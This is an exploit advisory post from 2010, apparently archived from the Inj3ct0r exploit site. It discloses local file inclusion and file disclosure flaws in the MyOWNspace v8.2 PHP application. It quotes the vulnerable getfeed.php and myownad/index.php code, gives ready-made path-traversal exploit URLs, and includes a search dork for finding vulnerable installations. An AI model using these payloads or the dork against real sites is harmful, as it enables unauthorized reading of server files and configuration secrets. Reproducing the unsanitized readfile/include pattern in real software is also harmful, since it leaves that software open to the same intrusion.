MyOWNspace v8.2 local file include & File Disclosure Vul
Posted on 12 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MyOWNspace v8.2 local file include & File Disclosure Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================== MyOWNspace v8.2 local file include & File Disclosure Vulnerability ================================================================== # Exploit Title: [MyOWNspace v8.2 local file include & File Disclosure Vulnerability] # Date: [2010-06-12] # Author: [DarK c0d3r] # Software Link: [http://sourceforge.net/project/platformdownload.php?group_id=174729] # Version: [8.2] # Platform / Tested on: [php] -::TYPE # category: [webapps/0day ] # Code : [======================================================================= MyOWNspace v8.2 local file include & File Disclosure Vulnerability ======================================================================= =========================================================================== ( #Topic : MyOWNspace_v8.2 ( #Bug type : local file include & File Disclosure Vulnerability ( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729 ( #DorK : " Nopyright 2006 MyOWNSpace.FR" =========================================================================== ( #Author : DarK c0d3r ( #Email : agramksa@w.cn ( #Website: http://www.sa-hacker.com ( #Forum : http://www.sa-hacker.com/vb/ ( #discovered by : DarK c0d3r ===================================================================== File Disclosure Vulnerability ===================================================================== getfeed.php ===================================================================== $filename = $_GET['file']; <===================== warning // build file headers header("content-type:text/xml;charset=utf-8"); // refer to file and exit readfile("$filename"); exit(); --------------------------------------------------------------------------- classes/flash_mp3_player.23/extras/external_feeds/getfeed.php --------------------------------------------------------------------------- $filename = $_GET['file']; // build file headers header("content-type:text/xml;charset=utf-8"); // refer to file and exit readfile("$filename"); exit(); --------------------------------------------------------------------------- Exploit : http://localhost/PATH/classes/flash_mp3_player/extras/external_feeds/getfeed.php?file=../../../../index.php http://localhost/path/classes/flash_mp3_player.23/extras/external_feeds/getfeed.php?file=../../../../index.php ============================================================================ local file include ============================================================================ myownad/index.php if(isset($_GET['u'])) $conf_file="../myownad/config".$_GET['u'].".php"; else $conf_file="../myownad/config.php"; include($conf_file); Exploit : http://localhost/path/myownad/index.php?u=../../../index =============================================================================] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
